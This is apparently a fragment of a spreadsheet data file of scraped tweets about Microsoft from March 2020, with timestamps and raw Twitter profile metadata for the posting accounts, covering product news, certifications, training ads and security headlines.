#powerbi https://t.co/91BTV1U0BY</t>
  </si>
  <si>
    <t>{'id': 1152966582701830146, 'id_str': '1152966582701830146', 'name': 'KratosBI', 'screen_name': 'KratosBi', 'location': 'Milwaukee, WI', 'description': 'Data God, Business Intelligence and Analytics. \n\nMy mom calls me Chris. My drivers license says Christopher Wagner.', 'url': 'https://t.co/920CatNYmn', 'entities': {'url': {'urls': [{'url': 'https://t.co/920CatNYmn', 'expanded_url': 'http://kratosbi.com', 'display_url': 'kratosbi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 486, 'friends_count': 659, 'listed_count': 10, 'created_at': 'Sun Jul 21 15:40:29 +0000 2019', 'favourites_count': 266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222707654826610688/RN2ND71G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222707654826610688/RN2ND71G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1152966582701830146/1579381830',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</si>
  <si>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19:39:01 +0000 2020</t>
  </si>
  <si>
    <t>Developers have lost hope Microsoft will do the right thing. Some programmers who want to see a cross-platform solution, rather than just being Windows-only. What are your thoughts?
https://t.co/Dn3cpLScLY
#microsoft #crossplatform #WinUI #linux</t>
  </si>
  <si>
    <t>{'id': 1191684025477255168, 'id_str': '1191684025477255168', 'name': 'Competenza Innovare', 'screen_name': 'thecompetenza', 'location': 'India', 'description': 'A leading IT consulting &amp; custom software + mobile app development company helping SMBs to Large enterprises. Email: info@thecompetenza.com Call: +91-9509617327', 'url': 'https://t.co/lZ1AP4nZ6z', 'entities': {'url': {'urls': [{'url': 'https://t.co/lZ1AP4nZ6z', 'expanded_url': 'https://www.competenzainnovare.com/', 'display_url': 'competenzainnovare.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Tue Nov 05 11:50:14 +0000 2019', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 95, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191684569977643008/2JNLz-JI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191684569977643008/2JNLz-JI_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1191684025477255168/1572956926',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</si>
  <si>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19:35:41 +0000 2020</t>
  </si>
  <si>
    <t>Cisco ushers in a bright new age of bridges https://t.co/DbeMfeFX0Y For more info: https://t.co/JnRqIskK3L #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business #tech https://t.co/rwliyd1Is2</t>
  </si>
  <si>
    <t>Sun Mar 01 19:35:24 +0000 2020</t>
  </si>
  <si>
    <t>Good to know that like us #Microsoft also has the user at heart when talking #innovation &amp;amp; #solutions in #digital.
Latest update extends #data collation to improve #UX, #CX &amp;amp; focus on the people.
#userexperience #digitalinnovation #businesstransformation
https://t.co/FP13aOygRB</t>
  </si>
  <si>
    <t>{'id': 883330198988574720, 'id_str': '883330198988574720', 'name': 'Marjolo', 'screen_name': 'LetstalkMarjolo', 'location': 'Sheffield, England', 'description': 'We design better businesses. Achieving sustainable transformation by designing innovative delivery methods that have both your people and technology at the core', 'url': 'https://t.co/Xsb8cwtpmn', 'entities': {'url': {'urls': [{'url': 'https://t.co/Xsb8cwtpmn', 'expanded_url': 'http://www.marjolo.co.uk', 'display_url': 'marjolo.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 156, 'listed_count': 1, 'created_at': 'Fri Jul 07 14:21:45 +0000 2017', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/883333491051696129/9iJ4CdfM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/883333491051696129/9iJ4CdfM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/883330198988574720/1574092814',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</si>
  <si>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19:28:28 +0000 2020</t>
  </si>
  <si>
    <t>Get Started Tutorial with Python on VS Code
#python #vscode #microsoft #programming #development https://t.co/wgCBPrnWjp https://t.co/czrO8mgIWg</t>
  </si>
  <si>
    <t>Sun Mar 01 19:22:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #SwiftKey #Keyboard adds support for Dark Mode on #Android phones and #tablets https://t.co/uSYlyfz2L1 #Smartphone #Tech #TechNews #Technology #TechnologyNews #ITRTG #SNRTG https://t.co/S56YIXM3SP</t>
  </si>
  <si>
    <t>{'id': 15345945, 'id_str': '15345945', 'name': 'Rodney Walker', 'screen_name': 'Rodney_Walker', 'location': 'Brooklyn, NY', 'description': 'Rodney is CEO of Zevia, Inc., an information technology company based in New York.', 'url': 'http://t.co/N7ghe4WHGD', 'entities': {'url': {'urls': [{'url': 'http://t.co/N7ghe4WHGD', 'expanded_url': 'http://www.rodney-walker.com', 'display_url': 'rodney-walker.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3089, 'friends_count': 2679, 'listed_count': 414, 'created_at': 'Mon Jul 07 20:13:16 +0000 2008', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 29817, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'AF131E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1655673281/RAWCARIC_Twitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1655673281/RAWCARIC_Twitter_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15345945/1348675445', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 19:21:18 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "New Evasion Encyclopedia Shows How Malware Detects Virtual Machines:" https://t.co/yPc6L6V6FS
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Sun Mar 01 19:19:05 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 19:15:20 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 19:08:46 +0000 2020</t>
  </si>
  <si>
    <t>As of today, I'm a proud member of the #microsoft #dataplatform #mvpbuzz community. Absolutely delighted about it, and very much looking forward to new interactions.
Thank you to all people involved for supporting me in this journey, especially the ones that nominated me! https://t.co/nLc4ARB2ql</t>
  </si>
  <si>
    <t>{'id': 40247846, 'id_str': '40247846', 'name': 'Benni De Jagere', 'screen_name': 'BenniDeJagere', 'location': 'Antwerp', 'description': 'Senior Data Insights Consultant . Data Enthusiast . Coffee Addict . Karateka . Fulltime weirdo . Co-lead at https://t.co/vxDt7zdVU1', 'url': 'http://t.co/9t6ampj89G', 'entities': {'url': {'urls': [{'url': 'http://t.co/9t6ampj89G', 'expanded_url': 'http://bennidejagere.com/', 'display_url': 'bennidejagere.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/vxDt7zdVU1', 'expanded_url': 'http://dataminds.be', 'display_url': 'dataminds.be', 'indices': [108, 131]}]}}, 'protected': False, 'followers_count': 1120, 'friends_count': 2840, 'listed_count': 25, 'created_at': 'Fri May 15 14:15:33 +0000 2009', 'favourites_count': 1623, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1400,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'http://pbs.twimg.com/profile_images/630742796941459456/CAamb1N1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/630742796941459456/CAamb1N1_normal.jpg',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</si>
  <si>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19:07:54 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of #Microsoft Windows 10 Users via @forbes 
#InformationSecurity #Security #cybersecurity #infosec #malware #data #datasecurity #dataprotection #ITSecurity #cybercrime #cyberthreats #Windows 
https://t.co/QWBIuxqbEH</t>
  </si>
  <si>
    <t>{'id': 3334953305, 'id_str': '3334953305', 'name': 'Net DirXions Inc.', 'screen_name': 'NetDirXions', 'location': 'Boston, MA', 'description': 'Transforming #SMB with #Technology and platform of #IT solutions, and #cloud #cybersecurity #security #Technews #cloudcomputing #IoT #infosec #ransomware #VoIP', 'url': 'https://t.co/0oDHh9JZLL', 'entities': {'url': {'urls': [{'url': 'https://t.co/0oDHh9JZLL', 'expanded_url': 'https://www.linkedin.com/in/johnenrightjr/', 'display_url': 'linkedin.com/in/johnenrightâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6874, 'friends_count': 7052, 'listed_count': 358, 'created_at': 'Fri Jun 19 15:16:37 +0000 2015', 'favourites_count': 5730, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18018,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'http://pbs.twimg.com/profile_images/857292286635495425/Rzg2C02I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/857292286635495425/Rzg2C02I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3334953305/1564060632',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</si>
  <si>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19:05:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edge Now Lets You Block Potentially Unwanted Programs #infosec https://t.co/PMRLEDDD7b https://t.co/xiszQ7NklO</t>
  </si>
  <si>
    <t>{'id': 21232519, 'id_str': '21232519', 'name': 'TEAM CYMRU', 'screen_name': 'teamcymru', 'location': 'Lake Mary, FL', 'description': 'We exist to enable organizations to identify and eradicate threats within their network by providing unique insight that saves and improves human lives', 'url': 'http://t.co/UwUb1b04XR', 'entities': {'url': {'urls': [{'url': 'http://t.co/UwUb1b04XR', 'expanded_url': 'http://www.team-cymru.com/aboutus.html', 'display_url': 'team-cymru.com/aboutus.html', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40215, 'friends_count': 16, 'listed_count': 1825, 'created_at': 'Wed Feb 18 19:42:42 +0000 2009', 'favourites_count': 111, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22065,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'http://pbs.twimg.com/profile_images/520651199318466560/Y9Tf9FMP_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/520651199318466560/Y9Tf9FMP_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21232519/1412968450', 'profile_link_color': '118654',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</si>
  <si>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19:00:05 +0000 2020</t>
  </si>
  <si>
    <t>.@Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the blog:     #Avtex https://t.co/zqgd0YLsL7</t>
  </si>
  <si>
    <t>Sun Mar 01 18:56:48 +0000 2020</t>
  </si>
  <si>
    <t>Men of Color Computer Science for all event.. Drone Giveaway #cs4allnyc #Microsoft #brooklyn @CS4AllKids @CS4AllNYC @nycmenteach https://t.co/TY5V6Qs3vy</t>
  </si>
  <si>
    <t>{'id': 768561114556821504, 'id_str': '768561114556821504', 'name': 'DroneTech UAS', 'screen_name': 'DroneTechUAS', 'location': 'New York, USA', 'description': 'Drone Tech UAS Creative &amp; Innovative Solutions  that Keeps Your Facility Safe From Contraband Intrusion', 'url': 'https://t.co/b9cRow8bPG', 'entities': {'url': {'urls': [{'url': 'https://t.co/b9cRow8bPG', 'expanded_url': 'http://dronetechuas.com', 'display_url': 'dronetechuas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 135, 'friends_count': 194, 'listed_count': 4, 'created_at': 'Wed Aug 24 21:30:23 +0000 2016', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 356, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/827780725420068865/JCqf02kC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/827780725420068865/JCqf02kC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/768561114556821504/1486235738',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</si>
  <si>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18:53:04 +0000 2020</t>
  </si>
  <si>
    <t>Got my account all updated. 
#halo #xbox #SundayMorning #gamertag #microsoft https://t.co/DoOadOwho2</t>
  </si>
  <si>
    <t>Sun Mar 01 18:49:46 +0000 2020</t>
  </si>
  <si>
    <t>illing while embracing, hugging, smiling... https://t.co/5snEBhCUKv #microsoft #novell #gnu #linux</t>
  </si>
  <si>
    <t>Sun Mar 01 18:48:53 +0000 2020</t>
  </si>
  <si>
    <t>An insight in to how we manage privileged accounts at #Microsoft https://t.co/CHfCvQErRi</t>
  </si>
  <si>
    <t>{'id': 28885075, 'id_str': '28885075', 'name': 'Ajay Iyer', 'screen_name': 'iyerajay1', 'location': 'St. Louis, MO', 'description': 'Modern Workplace Technical Architect at Microsoft Technology Center. Enjoy designing and architecting Microsoft 365 Solutions.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 437, 'friends_count': 699, 'listed_count': 75, 'created_at': 'Sat Apr 04 22:32:48 +0000 2009', 'favourites_count': 4306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3870,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'http://pbs.twimg.com/profile_images/1029333187518967808/apaTzu6P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029333187518967808/apaTzu6P_normal.jpg',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</si>
  <si>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Sun Mar 01 18:46:21 +0000 2020</t>
  </si>
  <si>
    <t>Can @Outlook please fix ios app ? After recent update cant even open it anymore  #ios #outlookapp #microsoft #iphone https://t.co/GOHCRmweRw</t>
  </si>
  <si>
    <t>{'id': 1091693475593158656, 'id_str': '1091693475593158656', 'name': 'Paula DWðŸŽ²', 'screen_name': 'PaulaDW_', 'location': 'London, England', 'description': '2x #Salesforce Certified AdminðŸ¥³ / Double Trailhead Ranger ðŸ¥¾ / Yamaha XV535 Owner ðŸï¸ / ðŸ‡¬ðŸ‡§ ðŸ‡µðŸ‡±', 'url': 'https://t.co/XhNp8V25aW', 'entities': {'url': {'urls': [{'url': 'https://t.co/XhNp8V25aW', 'expanded_url': 'https://trailblazer.me/id/pauladrewicz', 'display_url': 'trailblazer.me/id/pauladrewicz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 900, 'friends_count': 552, 'listed_count': 6, 'created_at': 'Sat Feb 02 13:43:02 +0000 2019', 'favourites_count': 12871, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2465, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235212164702625795/M6gBKkur_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235212164702625795/M6gBKkur_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1091693475593158656/1578055023',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</si>
  <si>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18:45:10 +0000 2020</t>
  </si>
  <si>
    <t>The Weirdest Productivity Tip Youll Hear Today
Did you know that chewing gum has incredible effects to your productivity?
Read more --&amp;gt; https://t.co/GIev3hEjly
#uwinpro #toronto #corporatetraining #computerscience #productivitytips #tips #sundaymood #microsoft</t>
  </si>
  <si>
    <t>{'id': 88987837, 'id_str': '88987837', 'name': 'UWIN Pro Inc.', 'screen_name': 'UWINPro', 'location': 'Toronto, ON (Canada)', 'description': 'UWIN Pro offers a variety of courses in IT &amp; Business. Online, Onsite and Corporate/Group training available Contact us today! 416-489-8946 416-850-1456', 'url': 'http://t.co/2CvaK40FNT', 'entities': {'url': {'urls': [{'url': 'http://t.co/2CvaK40FNT', 'expanded_url': 'http://www.uwinpro.com', 'display_url': 'uwinpro.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 46, 'listed_count': 3, 'created_at': 'Tue Nov 10 18:24:07 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 199,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'http://pbs.twimg.com/profile_images/459454890780012544/ohzBEVu-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459454890780012544/ohzBEVu-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88987837/1398377293', 'profile_link_color': '14D7DE',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</si>
  <si>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Sun Mar 01 18:30:29 +0000 2020</t>
  </si>
  <si>
    <t>What sacred cows did Microsoft tackle to change culture? #Microsoft #ChangeManagement #ChangeStrategy #ChangeLeadership #LeadingChange #leadership #change #management #SacredCows #BusinessCulture #OrganizationalCulture #teambuilding #DrivingChange https://t.co/vT57KrxdcV</t>
  </si>
  <si>
    <t>{'id': 264962685, 'id_str': '264962685', 'name': 'Mike Lehr', 'screen_name': 'MikeLehrOZA', 'location': 'Northeast Ohio', 'description': 'Twitterâ€™s #1 #ChangeManagement #KOL Influencing &amp; Problem-solving, IT Owner, Speaker, Trainer, Writer, Analogy King, Thought Provocateur &amp; Originator, Runner', 'url': 'https://t.co/OaONOoFcIp', 'entities': {'url': {'urls': [{'url': 'https://t.co/OaONOoFcIp', 'expanded_url': 'http://www.omegazadvisors.com', 'display_url': 'omegazadvisors.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62304, 'friends_count': 49936, 'listed_count': 2473, 'created_at': 'Sat Mar 12 19:19:39 +0000 2011', 'favourites_count': 848, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 215324, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '020562', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/499646671534309376/Lqb1UYZq_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/499646671534309376/Lqb1UYZq_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/264962685/1408030232', 'profile_link_color': '13359D', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFE494', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 18:19:13 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "How to Pause Windows 10 Automatic Updates To Avoid Critical Bugs:" https://t.co/5BVG5S1GMK
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Sun Mar 01 18:19:07 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft: Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 https://t.co/ubUFri2RS0 $MSFT #Microsoft #Technology #Tech #MSFT #digitaltransformation https://t.co/1DMjq9Uqfe</t>
  </si>
  <si>
    <t>Sun Mar 01 18:12:57 +0000 2020</t>
  </si>
  <si>
    <t>Going for the Kill https://t.co/5snEBhCUKv #microsoft #freesw #gnu #linux #novell</t>
  </si>
  <si>
    <t>Sun Mar 01 18:12:11 +0000 2020</t>
  </si>
  <si>
    <t>Call for Speakers for the #GlobalAzure 2020 in #Wellington is open now. Come along and share your stories or experiences on #Azure with the community #microsoftazure  #Microsoft #NZ</t>
  </si>
  <si>
    <t>{'id': 738400607166472192, 'id_str': '738400607166472192', 'name': 'Raju RH', 'screen_name': 'rajurh85', 'location': 'Wellington City, New Zealand', 'description': '', 'url': 'https://t.co/6avXlBgCSM', 'entities': {'url': {'urls': [{'url': 'https://t.co/6avXlBgCSM', 'expanded_url': 'http://rajurh.blogspot.com/', 'display_url': 'rajurh.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 25, 'listed_count': 1, 'created_at': 'Thu Jun 02 16:03:18 +0000 2016', 'favourites_count': 249, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1199, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1203280340283867136/-NtGgSaV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203280340283867136/-NtGgSaV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/738400607166472192/1507422493',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</si>
  <si>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18:11:31 +0000 2020</t>
  </si>
  <si>
    <t>Report: #Microsoft #Edge Browser introduces feature to block 'potentially unwanted applications' like #adware and #crypto #miners. Edge also provides tracking prevention feature to enable users block undesired trackers from following them around the #web.
https://t.co/FzuiSqIXne</t>
  </si>
  <si>
    <t>{'id': 962043372004196352, 'id_str': '962043372004196352', 'name': 'Important Crypto News and Info', 'screen_name': 'MajorCryptoNews', 'location': 'The Moon', 'description': 'Reporting key #Bitcoin, #crypto and #blockchain news, info and analysis from experts in the crypto space to help inform followers. Tweets not investment advice.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4136, 'friends_count': 5004, 'listed_count': 36, 'created_at': 'Fri Feb 09 19:19:48 +0000 2018', 'favourites_count': 2386, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5990, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213179104918429699/KhCzWFYx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213179104918429699/KhCzWFYx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/962043372004196352/1574526146',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</si>
  <si>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18:09:26 +0000 2020</t>
  </si>
  <si>
    <t>Still a bit in shock, I have received the Microsoft MVP award for Azure! Thank you to all the great people who have supported me, I am so happy  #MVPBuzz #Azure #Microsoft https://t.co/M0dprLlGlW</t>
  </si>
  <si>
    <t>{'id': 828169557206564864, 'id_str': '828169557206564864', 'name': 'Barbara 4bes', 'screen_name': 'Ba4bes', 'location': 'The Netherlands', 'description': '|| Microsoft Azure MVP | MCT |  IT Consultant @SCCT_NL || Azure | PowerShell | Automation |  Infra as Code | Azure DevOps | Serverless | O365 |', 'url': 'https://t.co/UzSzTLIw3S', 'entities': {'url': {'urls': [{'url': 'https://t.co/UzSzTLIw3S', 'expanded_url': 'https://4bes.nl', 'display_url': '4bes.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1056, 'friends_count': 215, 'listed_count': 21, 'created_at': 'Sun Feb 05 09:13:03 +0000 2017', 'favourites_count': 1272, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 513,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'http://pbs.twimg.com/profile_images/1039401121205370886/WeV0CHUw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039401121205370886/WeV0CHUw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/828169557206564864/1536648248',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</si>
  <si>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18:09:19 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft bad store and connection and wifi and server and service and mail app</t>
  </si>
  <si>
    <t>Sun Mar 01 18:09:17 +0000 2020</t>
  </si>
  <si>
    <t>@campuscodi #Microsoft owns their own dam code. The could just update code base to remove it completely. Take away the choice to make dumb ass decisions that affect everyones baseline security. Breachs have real victims</t>
  </si>
  <si>
    <t>{'id': 271929998, 'id_str': '271929998', 'name': 'diocyde', 'screen_name': 'diocyde', 'location': '3rd Ring of Hell', 'description': 'Walks in Darkness, Bathed in Light. Explorer of Offensive Information Warfare Thought Memes, Destruction of Hostile Infrastructures.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2036, 'friends_count': 2640, 'listed_count': 150, 'created_at': 'Fri Mar 25 13:26:43 +0000 2011', 'favourites_count': 7079, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29371,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'http://pbs.twimg.com/profile_images/1286757728/wipe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1286757728/wipe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/271929998/1354545547',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</si>
  <si>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Sun Mar 01 18:07:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 https://t.co/7qoPZtUDu8</t>
  </si>
  <si>
    <t>Sun Mar 01 18:05:02 +0000 2020</t>
  </si>
  <si>
    <t>5 ways to make #Windows10 more secure https://t.co/3rXME4F1Qh #FoxNews #informedsecurity #Microsoft https://t.co/peyRzZqLSa</t>
  </si>
  <si>
    <t>Sun Mar 01 18:01:09 +0000 2020</t>
  </si>
  <si>
    <t>Our concise, clear, up to date online course is the #1 rated online Train-The-Trainer Certification course. PrepMasters USA is #Microsoft approved  Enroll today to earn tomorrow - https://t.co/hHlcnus0xt https://t.co/sXOUjur870</t>
  </si>
  <si>
    <t>Webinar: Why its not enough to rely on Microsofts native capabilities for O365 data #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/JdCtlT0khk</t>
  </si>
  <si>
    <t>Sun Mar 01 18:00:56 +0000 2020</t>
  </si>
  <si>
    <t>Unlike other video game controllers, "the Adaptive Controller gives the user the ability to adapt their world and experience in ways that work for them." #Microsoft #Xbox #gaming https://t.co/aPRFnEhp2V</t>
  </si>
  <si>
    <t>{'id': 747829746516451329, 'id_str': '747829746516451329', 'name': 'Accessible360', 'screen_name': 'Accessible_360', 'location': 'Minneapolis, MN', 'description': 'Digital Accessibility Experts ~ Audits, Development/Remediation Support, Training, Monitoring &amp; ADA compliance strategy.', 'url': 'https://t.co/0wpkcHFt1I', 'entities': {'url': {'urls': [{'url': 'https://t.co/0wpkcHFt1I', 'expanded_url': 'http://www.accessible360.com', 'display_url': 'accessible360.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 418, 'friends_count': 569, 'listed_count': 13, 'created_at': 'Tue Jun 28 16:31:20 +0000 2016', 'favourites_count': 392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2014,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'http://pbs.twimg.com/profile_images/747838525563756545/-MIlU8B1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/747838525563756545/-MIlU8B1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/747829746516451329/1505844682',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</si>
  <si>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18:00:31 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @Microsoft @MSDYN365BC https://t.co/j4xTpB36jh</t>
  </si>
  <si>
    <t>Sun Mar 01 18:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 18:00:19 +0000 2020</t>
  </si>
  <si>
    <t>#MyComputerCareer offers essential courses from CompTIA, Cisco, and #Microsoft to #Linux and EC-Council, which will help you to excel in your #IT role. https://t.co/ovcYqJRbaE https://t.co/C53595jNba</t>
  </si>
  <si>
